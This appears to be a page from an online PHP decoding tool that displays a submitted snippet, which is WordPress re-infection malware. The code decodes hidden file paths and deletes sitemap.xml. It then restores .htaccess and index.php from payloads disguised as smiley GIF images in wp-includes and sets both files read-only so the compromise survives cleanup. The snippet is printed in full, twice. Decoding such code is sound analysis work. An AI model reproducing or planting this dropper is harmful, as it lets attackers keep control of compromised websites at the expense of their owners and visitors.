Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
/ckIIbg $nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M="); $nowIndexFile = base64_decode("L..
Decoded Output download
<? /ckIIbg $nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M="); $nowIndexFile = base64_decode("Li9pbmRleC5waHA="); $bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif'; $bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif'; $sitemap = base64_decode("Li9zaXRlbWFwLnhtbA=="); @unlink($sitemap); if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0555); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or filesize($nowIndexFile) != filesize($bkLocalFileIndex1)){ @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0555); } } //ckIIbg $nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M="); $nowIndexFile = base64_decode("Li9pbmRleC5waHA="); $bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif'; $bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif'; $sitemap = base64_decode("Li9zaXRlbWFwLnhtbA=="); @unlink($sitemap); if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0555); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or filesize($nowIndexFile) != filesize($bkLocalFileIndex1)){ @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0555); } } ?>
Did this file decode correctly?
Original Code
/ckIIbg $nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M="); $nowIndexFile = base64_decode("Li9pbmRleC5waHA="); $bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif'; $bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif'; $sitemap = base64_decode("Li9zaXRlbWFwLnhtbA=="); @unlink($sitemap); if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0555); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or filesize($nowIndexFile) != filesize($bkLocalFileIndex1)){ @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0555); } } //ckIIbg $nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M="); $nowIndexFile = base64_decode("Li9pbmRleC5waHA="); $bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif'; $bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif'; $sitemap = base64_decode("Li9zaXRlbWFwLnhtbA=="); @unlink($sitemap); if($nowHtacFile && file_exists($bkLocalFileHtac1)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){ @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1)); @chmod($nowHtacFile,0555); } } if(file_exists($bkLocalFileIndex1)){ if(!file_exists($nowIndexFile) or filesize($nowIndexFile) != filesize($bkLocalFileIndex1)){ @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1)); @chmod($nowIndexFile,0555); } }
Function Calls
None |
Stats
MD5 | 906ae28210e1f276c1eb5e82cd1e39c2 |
Eval Count | 0 |
Decode Time | 37 ms |